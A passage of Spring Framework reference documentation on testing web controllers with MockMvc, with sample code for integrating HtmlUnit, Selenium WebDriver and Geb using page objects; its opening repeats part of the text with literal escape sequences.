MyWebTests {\n\n\t\tprivate MockMvc mockMvc;\n\n\t\t@Before\n\t\tpublic void setup() {\n\t\t\tmockMvc = standaloneSetup(new AccountController())\n\t\t\t\t.defaultRequest(get(\"\/\")\n\t\t\t\t.contextPath(\"\/app\").servletPath(\"\/main\")\n\t\t\t\t.accept(MediaType.APPLICATION_JSON).build();\n\t\t}\n----\n\nThe above properties will affect every request performed through the `MockMvc` instance.\nIf the same property is also specified on a given request, it overrides the default value.\nThat is why the HTTP method and URI in the default request don't matter since they must be\nspecified on every request.\n\n[[spring-mvc-test-server-defining-expectations]]\n===== Defining Expectations\nExpectations can be defined by appending one or more `.andExpect(..)` calls after\nperforming a request:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tmockMvc.perform(get(\"\/accounts\/1\")).andExpect(status().isOk());\n----\n\n`MockMvcResultMatchers.*` provides a number of expectations, some of which are further\nnested with more detailed expectations.\n\nExpectations fall in two general categories. 
[[spring-mvc-test-server-defining-expectations]]
===== Defining Expectations
Expectations can be defined by appending one or more `.andExpect(..)` calls after
performing a request:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/accounts/1")).andExpect(status().isOk());
----

`MockMvcResultMatchers.*` provides a number of expectations, some of which are further
nested with more detailed expectations.

Expectations fall into two general categories. The first category of assertions verifies
properties of the response: for example, the response status, headers, and content. These
are the most important results to assert.

The second category of assertions goes beyond the response. These assertions allow
one to inspect Spring MVC specific aspects such as which controller method processed
the request, whether an exception was raised and handled, what the content of the model
is, what view was selected, what flash attributes were added, and so on. They also allow
one to inspect Servlet specific aspects such as request and session attributes.

The following test asserts that binding or validation failed:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

Many times when writing tests, it's useful to _dump_ the results of the performed request.
This can be done as follows, where `print()` is a static import from
`MockMvcResultHandlers`:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(post("/persons"))
		.andDo(print())
		.andExpect(status().isOk())
		.andExpect(model().attributeHasErrors("person"));
----

As long as request processing does not cause an unhandled exception, the `print()` method
will print all the available result data to `System.out`. Spring Framework 4.2 introduced
a `log()` method and two additional variants of the `print()` method, one that accepts
an `OutputStream` and one that accepts a `Writer`. For example, invoking
`print(System.err)` will print the result data to `System.err`, while invoking
`print(myWriter)` will print the result data to a custom writer. If you would like to
have the result data _logged_ instead of printed, simply invoke the `log()` method, which
will log the result data as a single `DEBUG` message under the
`org.springframework.test.web.servlet.result` logging category.
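
For instance, the alternative handlers can be combined as follows (a sketch reusing the
hypothetical `/persons` endpoint from above; `log()` output appears only if `DEBUG`
logging is enabled for the category just mentioned):

[source,java,indent=0]
----
	mockMvc.perform(post("/persons"))
		.andDo(log())               // log the result data as a single DEBUG message
		.andDo(print(System.err))   // print the result data to System.err
		.andExpect(status().isOk());
----
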
In some cases, you may want to get direct access to the result and verify something that
cannot be verified otherwise. This can be achieved by appending `.andReturn()` after all
other expectations:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	MvcResult mvcResult = mockMvc.perform(post("/persons")).andExpect(status().isOk()).andReturn();
	// ...
----

If all tests repeat the same expectations, you can set up common expectations once
when building the `MockMvc` instance:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	standaloneSetup(new SimpleController())
		.alwaysExpect(status().isOk())
		.alwaysExpect(content().contentType("application/json;charset=UTF-8"))
		.build()
----

Note that common expectations are __always__ applied and cannot be overridden without
creating a separate `MockMvc` instance.

When JSON response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using JsonPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc.perform(get("/people").accept(MediaType.APPLICATION_JSON))
		.andExpect(jsonPath("$.links[?(@.rel == 'self')].href").value("http://localhost:8080/people"));
----

When XML response content contains hypermedia links created with
https://github.com/spring-projects/spring-hateoas[Spring HATEOAS], the resulting links can
be verified using XPath expressions:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	Map<String, String> ns = Collections.singletonMap("ns", "http://www.w3.org/2005/Atom");
	mockMvc.perform(get("/handle").accept(MediaType.APPLICATION_XML))
		.andExpect(xpath("/person/ns:link[@rel='self']/@href", ns).string("http://localhost:8080/people"));
----

[[spring-mvc-test-server-filters]]
===== Filter Registrations
When setting up a `MockMvc` instance, you can register one or more Servlet `Filter` instances:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	mockMvc = standaloneSetup(new PersonController()).addFilters(new CharacterEncodingFilter()).build();
----

Registered filters will be invoked through the `MockFilterChain` from `spring-test`, and the
last filter will delegate to the `DispatcherServlet`.

[[spring-mvc-test-vs-end-to-end-integration-tests]]
===== Differences between Out-of-Container and End-to-End Integration Tests

As mentioned earlier, __Spring MVC Test__ is built on the Servlet API mock objects from
the `spring-test` module and does not use a running Servlet container. Therefore
there are some important differences compared to full end-to-end integration tests
with an actual client and server running.

The easiest way to think about this is starting with a blank `MockHttpServletRequest`.
Whatever you add to it is what the request will be. Things that may catch you by surprise
are that there is no context path by default, no `jsessionid` cookie, no forwarding, error,
or async dispatches, and therefore no actual JSP rendering. Instead, "forwarded" and
"redirected" URLs are saved in the `MockHttpServletResponse` and can be asserted with
expectations.
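
For example, the saved values can be asserted with the `forwardedUrl(..)` and
`redirectedUrl(..)` result matchers (a sketch; the view path and redirect target are
made up):

[source,java,indent=0]
----
	mockMvc.perform(get("/accounts/1"))
		.andExpect(forwardedUrl("/WEB-INF/views/account.jsp"));

	mockMvc.perform(post("/persons"))
		.andExpect(redirectedUrl("/persons/1"));
----
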
This means that if you are using JSPs, you can verify the JSP page to which the request was
forwarded, but there won't be any HTML rendered. In other words, the JSP will not be
_invoked_. Note, however, that all other rendering technologies that don't rely on
forwarding, such as Thymeleaf, Freemarker, and Velocity, will render HTML to the response
body as expected. The same is true for rendering JSON, XML, and other formats via
`@ResponseBody` methods.

Alternatively, you may consider the full end-to-end integration testing support from
Spring Boot via `@WebIntegrationTest`. See the
{doc-spring-boot}/html/boot-features-testing.html#boot-features-testing-spring-boot-applications[Spring Boot reference].

There are pros and cons for each approach. The options provided in __Spring MVC Test__
are different stops on the scale from classic unit testing to full integration testing.
To be certain, none of the options in Spring MVC Test fall under the category of classic
unit testing, but they _are_ a little closer to it. For example, you can isolate the web
layer by injecting mocked services into controllers, in which case you're testing the web
layer only through the `DispatcherServlet` but with actual Spring configuration, just
like you might test the data access layer in isolation from the layers above. Or you
can use the standalone setup, focusing on one controller at a time and manually providing
the configuration required to make it work.

Another important distinction when using __Spring MVC Test__ is that conceptually such
tests operate on the _inside_ of the server, so you can check which handler was used,
whether an exception was handled by a `HandlerExceptionResolver`, what the content of the
model is, what binding errors there were, and so on. That means it's easier to write
expectations, since the server is not a black box as it is when testing through
an actual HTTP client. This is generally an advantage of classic unit testing: it's
easier to write, reason about, and debug, but it does not replace the need for full
integration tests. At the same time it's important not to lose sight of the fact that
the response is the most important thing to check. In short, there is room here for
multiple styles and strategies of testing even within the same project.


[[spring-mvc-test-server-resources]]
===== Further Server-Side Test Examples
The framework's own tests include
https://github.com/spring-projects/spring-framework/tree/master/spring-test/src/test/java/org/springframework/test/web/servlet/samples[many
sample tests] intended to demonstrate how to use Spring MVC Test. Browse these examples
for further ideas. Also the
https://github.com/spring-projects/spring-mvc-showcase[spring-mvc-showcase] has full test
coverage based on Spring MVC Test.


[[spring-mvc-test-server-htmlunit]]
==== HtmlUnit Integration

Spring provides integration between <<spring-mvc-test-server,MockMvc>> and
http://htmlunit.sourceforge.net/[HtmlUnit]. This simplifies performing end-to-end testing
when using HTML-based views.
This integration enables developers to:

* Easily test HTML pages using tools such as http://htmlunit.sourceforge.net/[HtmlUnit],
http://seleniumhq.org/projects/webdriver/[WebDriver], and
http://www.gebish.org/manual/current/testing.html#spock_junit__testng[Geb] without the
need to deploy to a Servlet container
* Test JavaScript within pages
* Optionally test using mock services to speed up testing
* Share logic between in-container end-to-end tests and out-of-container integration tests

[NOTE]
====
`MockMvc` works with templating technologies that do not rely on a Servlet Container
(e.g., Thymeleaf, Freemarker, and Velocity), but it does not work with JSPs since they
rely on the Servlet Container.
====

[[spring-mvc-test-server-htmlunit-why]]
===== Why HtmlUnit Integration?

The most obvious question that comes to mind is, "Why do I need this?" The answer is best
found by exploring a very basic sample application. Assume you have a Spring MVC web
application that supports CRUD operations on a `Message` object. The application also supports
paging through all messages. How would you go about testing it?

With Spring MVC Test, we can easily test whether we are able to create a `Message`.

[source,java]
----
MockHttpServletRequestBuilder createMessage = post("/messages/")
	.param("summary", "Spring Rocks")
	.param("text", "In case you didn't know, Spring Rocks!");

mockMvc.perform(createMessage)
	.andExpect(status().is3xxRedirection())
	.andExpect(redirectedUrl("/messages/123"));
----

What if we want to test the form view that allows us to create the message? For example,
assume our form looks like the following snippet:

[source,xml]
----
<form id="messageForm" action="/messages/" method="post">
	<div class="pull-right"><a href="/messages/">Messages</a></div>

	<label for="summary">Summary</label>
	<input type="text" class="required" id="summary" name="summary" value="" />

	<label for="text">Message</label>
	<textarea id="text" name="text"></textarea>

	<div class="form-actions">
		<input type="submit" value="Create" />
	</div>
</form>
----

How do we ensure that our form will produce the correct request to create a new message? A
naive attempt would look like this:

[source,java]
----
mockMvc.perform(get("/messages/form"))
	.andExpect(xpath("//input[@name='summary']").exists())
	.andExpect(xpath("//textarea[@name='text']").exists());
----

This test has some obvious drawbacks. If we update our controller to use the parameter
`message` instead of `text`, our form test would continue to pass even though the HTML
form is out of sync with the controller.
To resolve this we can combine our two tests.

[[spring-mvc-test-server-htmlunit-mock-mvc-test]]
[source,java]
----
String summaryParamName = "summary";
String textParamName = "text";
mockMvc.perform(get("/messages/form"))
		.andExpect(xpath("//input[@name='" + summaryParamName + "']").exists())
		.andExpect(xpath("//textarea[@name='" + textParamName + "']").exists());

MockHttpServletRequestBuilder createMessage = post("/messages/")
		.param(summaryParamName, "Spring Rocks")
		.param(textParamName, "In case you didn't know, Spring Rocks!");

mockMvc.perform(createMessage)
		.andExpect(status().is3xxRedirection())
		.andExpect(redirectedUrl("/messages/123"));
----

This would reduce the risk of our test incorrectly passing, but there are still some
problems.

* What if we have multiple forms on our page? Admittedly, we could update our XPath
expressions, but they get more complicated the more factors we take into account (Are the
fields the correct type? Are the fields enabled? etc.).
* Another issue is that we are doing double the work we would expect.
We must first verify the view, and then we submit the view with the same parameters we just
verified. Ideally this could be done all at once.
* Finally, there are some things that we still cannot account for. For example, what if the
form has JavaScript validation that we wish to test as well?

The overall problem is that testing a web page does not involve a single interaction.
Instead, it is a combination of how the user interacts with a web page and how that web
page interacts with other resources. For example, the result of a form view is used as
the input for a user to create a message. In addition, our form view may potentially
use additional resources that impact the behavior of the page, such as JavaScript
validation.

[[spring-mvc-test-server-htmlunit-why-integration]]
====== Integration testing to the rescue?

To resolve the issues above we could perform end-to-end integration testing, but this has
some obvious drawbacks. Consider testing the view that allows us to page through the messages.
We might need the following tests.

* Does our page display a notification to the user indicating that no results are available
when the messages are empty?
* Does our page properly display a single message?
* Does our page properly support paging?

To set up these tests, we would need to ensure that our database contained the proper
messages. This leads to a number of additional challenges.

* Ensuring the proper messages are in the database can be tedious; consider foreign key
constraints.
* Testing can become slow since each test would need to ensure that the database is in the
correct state.
* Since our database needs to be in a specific state, we cannot run tests in parallel.
* Performing assertions on things like auto-generated ids, timestamps, etc. can be difficult.

These challenges do not mean that we should abandon end-to-end integration testing
altogether. Instead, we can reduce the number of end-to-end integration tests by
refactoring our detailed tests to use mock services that will execute much faster, more
reliably, and without side effects.
We can then implement a small number of _true_\nend-to-end integration tests that validate simple workflows to ensure that everything\nworks together properly.\n\n[[spring-mvc-test-server-htmlunit-why-mockmvc]]\n====== Enter HtmlUnit Integration\n\nSo how can we achieve a balance between testing the interactions of our pages and still\nretain good performance within our test suite? The answer is: \"By integrating MockMvc\nwith HtmlUnit.\"\n\n[[spring-mvc-test-server-htmlunit-options]]\n====== HtmlUnit Integration Options\n\nThere are a number of ways to integrate `MockMvc` with HtmlUnit.\n\n* <<spring-mvc-test-server-htmlunit-mah,MockMvc and HtmlUnit>>: Use this option if you\nwant to use the raw HtmlUnit libraries.\n* <<spring-mvc-test-server-htmlunit-webdriver,MockMvc and WebDriver>>: Use this option to\nease development and reuse code between integration and end-to-end testing.\n* <<spring-mvc-test-server-htmlunit-geb,MockMvc and Geb>>: Use this option if you would\nlike to use Groovy for testing, ease development, and reuse code between integration and\nend-to-end testing.\n\n[[spring-mvc-test-server-htmlunit-mah]]\n===== MockMvc and HtmlUnit\n\nThis section describes how to integrate `MockMvc` and HtmlUnit. Use this option if you\nwant to use the raw HtmlUnit libraries.\n\n[[spring-mvc-test-server-htmlunit-mah-setup]]\n====== MockMvc and HtmlUnit Setup\n\nFirst, make sure that you have included a test dependency on `net.sourceforge.htmlunit:htmlunit`.\nIn order to use HtmlUnit with Apache HttpComponents 4.5+, you will need to use HtmlUnit\n2.18 or higher.\n\nWe can easily create an HtmlUnit `WebClient` that integrates with `MockMvc` using the\n`MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\n[NOTE]\n====\nThis is a simple example of using `MockMvcWebClientBuilder`. For advanced usage see\n<<Advanced MockMvcWebClientBuilder>>\n====\n\nThis will ensure that any URL referencing `localhost` as the server will be directed to\nour `MockMvc` instance without the need for a real HTTP connection. Any other URL will be\nrequested using a network connection as normal. This allows us to easily test the use of\nCDNs.\n\n[[spring-mvc-test-server-htmlunit-mah-usage]]\n====== MockMvc and HtmlUnit Usage\n\nNow we can use HtmlUnit as we normally would, but without the need to deploy our\napplication to a Servlet container. For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nHtmlPage createMsgFormPage = webClient.getPage(\"http:\/\/localhost\/messages\/form\");\n----\n\n[NOTE]\n====\nThe default context path is `\"\"`. 
Alternatively, we can specify the context path as\nillustrated in <<Advanced MockMvcWebClientBuilder>>.\n====\n\nOnce we have a reference to the `HtmlPage`, we can then fill out the form and submit\nit to create a message.\n\n[source,java]\n----\nHtmlForm form = createMsgFormPage.getHtmlElementById(\"messageForm\");\nHtmlTextInput summaryInput = createMsgFormPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(\"Spring Rocks\");\nHtmlTextArea textInput = createMsgFormPage.getHtmlElementById(\"text\");\ntextInput.setText(\"In case you didn't know, Spring Rocks!\");\nHtmlSubmitInput submit = form.getOneHtmlElementByAttribute(\"input\", \"type\", \"submit\");\nHtmlPage newMessagePage = submit.click();\n----\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ] library.\n\n[source,java]\n----\nassertThat(newMessagePage.getUrl().toString()).endsWith(\"\/messages\/123\");\nString id = newMessagePage.getHtmlElementById(\"id\").getTextContent();\nassertThat(id).isEqualTo(\"123\");\nString summary = newMessagePage.getHtmlElementById(\"summary\").getTextContent();\nassertThat(summary).isEqualTo(\"Spring Rocks\");\nString text = newMessagePage.getHtmlElementById(\"text\").getTextContent();\nassertThat(text).isEqualTo(\"In case you didn't know, Spring Rocks!\");\n----\n\nThis improves on our <<spring-mvc-test-server-htmlunit-mock-mvc-test,MockMvc test>> in a\nnumber of ways. First we no longer have to explicitly verify our form and then create a\nrequest that looks like the form. Instead, we request the form, fill it out, and submit\nit, thereby significantly reducing the overhead.\n\nAnother important factor is that http:\/\/htmlunit.sourceforge.net\/javascript.html[HtmlUnit\nuses the Mozilla Rhino engine] to evaluate JavaScript. This means that we can test the\nbehavior of JavaScript within our pages as well!\n\nRefer to the http:\/\/htmlunit.sourceforge.net\/gettingStarted.html[HtmlUnit documentation]\nfor additional information about using HtmlUnit.\n\n[[spring-mvc-test-server-htmlunit-mah-advanced-builder]]\n====== Advanced MockMvcWebClientBuilder\n\nIn the examples so far, we have used `MockMvcWebClientBuilder` in the simplest way possible,\nby building a `WebClient` based on the `WebApplicationContext` loaded for us by the Spring\nTestContext Framework. 
This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebClient webClient;\n\n@Before\npublic void setup() {\n\twebClient = MockMvcWebClientBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcWebClientBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\nwebClient = MockMvcWebClientBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebClient` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-webdriver]]\n===== MockMvc and WebDriver\n\nIn the previous sections, we have seen how to use `MockMvc` in conjunction with the raw\nHtmlUnit APIs. In this section, we will leverage additional abstractions within the Selenium\nhttp:\/\/docs.seleniumhq.org\/projects\/webdriver\/[WebDriver] to make things even easier.\n\n[[spring-mvc-test-server-htmlunit-webdriver-why]]\n====== Why WebDriver and MockMvc?\n\nWe can already use HtmlUnit and `MockMvc`, so why would we want to use `WebDriver`? The\nSelenium `WebDriver` provides a very elegant API that allows us to easily organize our code.\nTo better understand, let's explore an example.\n\n[NOTE]\n====\nDespite being a part of http:\/\/docs.seleniumhq.org\/[Selenium], WebDriver does not require\na Selenium Server to run your tests.\n====\n\nSuppose we need to ensure that a message is created properly. The tests involve finding\nthe HTML form input elements, filling them out, and making various assertions.\n\nThis approach results in numerous, separate tests because we want to test error\nconditions as well. For example, we want to ensure that we get an error if we fill out\nonly part of the form. If we fill out the entire form, the newly created message should\nbe displayed afterwards.\n\nIf one of the fields were named \"summary\", then we might have something like the\nfollowing repeated in multiple places within our tests.\n\n[source,java]\n----\nHtmlTextInput summaryInput = currentPage.getHtmlElementById(\"summary\");\nsummaryInput.setValueAttribute(summary);\n----\n\nSo what happens if we change the `id` to \"smmry\"? Doing so would force us to update all\nof our tests to incorporate this change! 
Of course, this violates the _DRY Principle_, so
we should ideally extract this code into its own method as follows.

[source,java]
----
public HtmlPage createMessage(HtmlPage currentPage, String summary, String text) {
	setSummary(currentPage, summary);
	// ...
}

public void setSummary(HtmlPage currentPage, String summary) {
	HtmlTextInput summaryInput = currentPage.getHtmlElementById("summary");
	summaryInput.setValueAttribute(summary);
}
----

This ensures that we do not have to update all of our tests if we change the UI.

We might even take this a step further and place this logic within an object that
represents the `HtmlPage` we are currently on.

[source,java]
----
public class CreateMessagePage {

	final HtmlPage currentPage;

	final HtmlTextInput summaryInput;

	final HtmlSubmitInput submit;

	public CreateMessagePage(HtmlPage currentPage) {
		this.currentPage = currentPage;
		this.summaryInput = currentPage.getHtmlElementById("summary");
		this.submit = currentPage.getHtmlElementById("submit");
	}

	public <T> T createMessage(String summary, String text) throws Exception {
		setSummary(summary);

		HtmlPage result = submit.click();
		boolean error = CreateMessagePage.at(result);

		return (T) (error ? new CreateMessagePage(result) : new ViewMessagePage(result));
	}

	public void setSummary(String summary) throws Exception {
		summaryInput.setValueAttribute(summary);
	}

	public static boolean at(HtmlPage page) {
		return "Create Message".equals(page.getTitleText());
	}
}
----

Formally, this pattern is known as the
https://code.google.com/p/selenium/wiki/PageObjects[Page Object Pattern]. While we can
certainly do this with HtmlUnit, WebDriver provides some tools that we will explore in the
following sections to make this pattern much easier to implement.

[[spring-mvc-test-server-htmlunit-webdriver-setup]]
====== MockMvc and WebDriver Setup

To use Selenium WebDriver with the Spring MVC Test framework, make sure that your project
includes a test dependency on `org.seleniumhq.selenium:selenium-htmlunit-driver`.

We can easily create a Selenium `WebDriver` that integrates with `MockMvc` using the
`MockMvcHtmlUnitDriverBuilder` as follows.

[source,java]
----
@Autowired
WebApplicationContext context;

WebDriver driver;

@Before
public void setup() {
	driver = MockMvcHtmlUnitDriverBuilder
		.webAppContextSetup(context)
		.build();
}
----

[NOTE]
====
This is a simple example of using `MockMvcHtmlUnitDriverBuilder`.
For more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>.
====

This will ensure that any URL referencing `localhost` as the server will be directed to
our `MockMvc` instance without the need for a real HTTP connection. Any other URL will be
requested using a network connection as normal. This allows us to easily test the use of
CDNs.

[[spring-mvc-test-server-htmlunit-webdriver-usage]]
====== MockMvc and WebDriver Usage

Now we can use WebDriver as we normally would, but without the need to deploy our
application to a Servlet container.
For example, we can request the view to create\na message with the following.\n\n[source,java]\n----\nCreateMessagePage page = CreateMessagePage.to(driver);\n----\n\nWe can then fill out the form and submit it to create a message.\n\n[source,java]\n----\nViewMessagePage viewMessagePage =\n\tpage.createMessage(ViewMessagePage.class, expectedSummary, expectedText);\n----\n\nThis improves on the design of our\n<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object\nPattern_. As we mentioned in <<spring-mvc-test-server-htmlunit-webdriver-why>>, we can\nuse the Page Object Pattern with HtmlUnit, but it is much easier with WebDriver. Let's\ntake a look at our new `CreateMessagePage` implementation.\n\n[source,java]\n----\npublic class CreateMessagePage\n\t\textends AbstractPage { \/\/ <1>\n\n\t\/\/ <2>\n\tprivate WebElement summary;\n\tprivate WebElement text;\n\n\t\/\/ <3>\n\t@FindBy(css = \"input[type=submit]\")\n\tprivate WebElement submit;\n\n\tpublic CreateMessagePage(WebDriver driver) {\n\t\tsuper(driver);\n\t}\n\n\tpublic <T> T createMessage(Class<T> resultPage, String summary, String details) {\n\t\tthis.summary.sendKeys(summary);\n\t\tthis.text.sendKeys(details);\n\t\tthis.submit.click();\n\t\treturn PageFactory.initElements(driver, resultPage);\n\t}\n\n\tpublic static CreateMessagePage to(WebDriver driver) {\n\t\tdriver.get(\"http:\/\/localhost:9990\/mail\/messages\/form\");\n\t\treturn PageFactory.initElements(driver, CreateMessagePage.class);\n\t}\n}\n----\n\n<1> The first thing you will notice is that `CreateMessagePage` extends the\n`AbstractPage`. We won't go over the details of `AbstractPage`, but in summary it\ncontains common functionality for all of our pages. For example, if our application has\na navigational bar, global error messages, etc., this logic can be placed in a shared\nlocation.\n\n<2> The next thing you will notice is that we have a member variable for each of the\nparts of the HTML page that we are interested in. These are of type `WebElement`.\n``WebDriver``'s https:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory[PageFactory] allows\nus to remove a lot of code from the HtmlUnit version of `CreateMessagePage` by\nautomatically resolving each `WebElement`. The\nhttp:\/\/selenium.googlecode.com\/git\/docs\/api\/java\/org\/openqa\/selenium\/support\/PageFactory.html#initElements-org.openqa.selenium.WebDriver-java.lang.Class-[PageFactory#initElements(WebDriver,Class<T>)]\nmethod will automatically resolve each `WebElement` by using the field name and looking it\nup by the `id` or `name` of the element within the HTML page.\n\n<3> We can use the\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/PageFactory#Making_the_Example_Work_Using_Annotations[@FindBy annotation]\nto override the default lookup behavior. Our example demonstrates how to use the `@FindBy`\nannotation to look up our submit button using a css selector, *input[type=submit]*.\n\nFinally, we can verify that a new message was created successfully. The following\nassertions use the https:\/\/code.google.com\/p\/fest\/[FEST assertion library].\n\n[source,java]\n----\nassertThat(viewMessagePage.getMessage()).isEqualTo(expectedMessage);\nassertThat(viewMessagePage.getSuccess()).isEqualTo(\"Successfully created a new message\");\n----\n\nWe can see that our `ViewMessagePage` allows us to interact with our custom domain\nmodel. 
For example, it exposes a method that returns a `Message` object.\n\n[source,java]\n----\npublic Message getMessage() throws ParseException {\n\tMessage message = new Message();\n\tmessage.setId(getId());\n\tmessage.setCreated(getCreated());\n\tmessage.setSummary(getSummary());\n\tmessage.setText(getText());\n\treturn message;\n}\n----\n\nWe can then leverage the rich domain objects in our assertions.\n\nLastly, don't forget to _close_ the `WebDriver` instance when the test is complete.\n\n[source,java]\n----\n@After\npublic void destroy() {\n\tif (driver != null) {\n\t\tdriver.close();\n\t}\n}\n----\n\nFor additional information on using WebDriver, refer to the Selenium\nhttps:\/\/code.google.com\/p\/selenium\/wiki\/GettingStarted[WebDriver documentation].\n\n[[spring-mvc-test-server-htmlunit-webdriver-advanced-builder]]\n====== Advanced MockMvcHtmlUnitDriverBuilder\n\nIn the examples so far, we have used `MockMvcHtmlUnitDriverBuilder` in the simplest way\npossible, by building a `WebDriver` based on the `WebApplicationContext` loaded for us by\nthe Spring TestContext Framework. This approach is repeated here.\n\n[source,java]\n----\n@Autowired\nWebApplicationContext context;\n\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t.webAppContextSetup(context)\n\t\t.build();\n}\n----\n\nWe can also specify additional configuration options.\n\n[source,java]\n----\nWebDriver driver;\n\n@Before\npublic void setup() {\n\tdriver = MockMvcHtmlUnitDriverBuilder\n\t\t\/\/ demonstrates applying a MockMvcConfigurer (Spring Security)\n\t\t.webAppContextSetup(context, springSecurity())\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n}\n----\n\nAs an alternative, we can perform the exact same setup by configuring the `MockMvc`\ninstance separately and supplying it to the `MockMvcHtmlUnitDriverBuilder` as follows.\n\n[source,java]\n----\nMockMvc mockMvc = MockMvcBuilders\n\t\t.webAppContextSetup(context)\n\t\t.apply(springSecurity())\n\t\t.build();\n\ndriver = MockMvcHtmlUnitDriverBuilder\n\t\t.mockMvcSetup(mockMvc)\n\t\t\/\/ for illustration only - defaults to \"\"\n\t\t.contextPath(\"\")\n\t\t\/\/ By default MockMvc is used for localhost only;\n\t\t\/\/ the following will use MockMvc for example.com and example.org as well\n\t\t.useMockMvcForHosts(\"example.com\",\"example.org\")\n\t\t.build();\n----\n\nThis is more verbose, but by building the `WebDriver` with a `MockMvc` instance we have\nthe full power of `MockMvc` at our fingertips.\n\n[TIP]\n====\nFor additional information on creating a `MockMvc` instance refer to\n<<spring-mvc-test-server-setup-options>>.\n====\n\n[[spring-mvc-test-server-htmlunit-geb]]\n===== MockMvc and Geb\n\nIn the previous section, we saw how to use `MockMvc` with `WebDriver`. In this section,\nwe will use http:\/\/www.gebish.org\/[Geb] to make our tests even Groovy-er.\n\n\n[[spring-mvc-test-server-htmlunit-geb-why]]\n====== Why Geb and MockMvc?\n\nGeb is backed by WebDriver, so it offers many of the\n<<spring-mvc-test-server-htmlunit-webdriver-why,same benefits>> that we get from\nWebDriver. 
However, Geb makes things even easier by taking care of some of the
boilerplate code for us.

[[spring-mvc-test-server-htmlunit-geb-setup]]
====== MockMvc and Geb Setup

We can easily initialize a Geb `Browser` with a Selenium `WebDriver` that uses `MockMvc`
as follows.

[source,groovy]
----
def setup() {
	browser.driver = MockMvcHtmlUnitDriverBuilder
		.webAppContextSetup(context)
		.build()
}
----

[NOTE]
====
This is a simple example of using `MockMvcHtmlUnitDriverBuilder`.
For more advanced usage, refer to <<Advanced MockMvcHtmlUnitDriverBuilder>>.
====

This will ensure that any URL referencing `localhost` as the server will be directed to
our `MockMvc` instance without the need for a real HTTP connection. Any other URL will be
requested using a network connection as normal. This allows us to easily test the use of
CDNs.

[[spring-mvc-test-server-htmlunit-geb-usage]]
====== MockMvc and Geb Usage

Now we can use Geb as we normally would, but without the need to deploy our
application to a Servlet container. For example, we can request the view to create
a message with the following:

[source,groovy]
----
to CreateMessagePage
----

We can then fill out the form and submit it to create a message.

[source,groovy]
----
when:
form.summary = expectedSummary
form.text = expectedMessage
submit.click(ViewMessagePage)
----

Any method calls or property accesses that cannot be resolved on the test itself will be
forwarded to the current page object. This removes a lot of the boilerplate code we needed
when using WebDriver directly.

As with direct WebDriver usage, this improves on the design of our
<<spring-mvc-test-server-htmlunit-mah-usage,HtmlUnit test>> by leveraging the _Page Object
Pattern_. As mentioned previously, we can use the Page Object Pattern with HtmlUnit and
WebDriver, but it is even easier with Geb. Let's take a look at our new Groovy-based
`CreateMessagePage` implementation.

[source,groovy]
----
class CreateMessagePage extends Page {
	static url = 'messages/form'
	static at = { assert title == 'Messages : Create'; true }
	static content = {
		submit { $('input[type=submit]') }
		form { $('form') }
		errors(required:false) { $('label.error, .alert-error')?.text() }
	}
}
----

The first thing you will notice is that our `CreateMessagePage` extends `Page`. We won't
go over the details of `Page`, but in summary it contains common functionality for all of
our pages. The next thing you will notice is that we define a URL at which this page can
be found. This allows us to navigate to the page as follows.

[source,groovy]
----
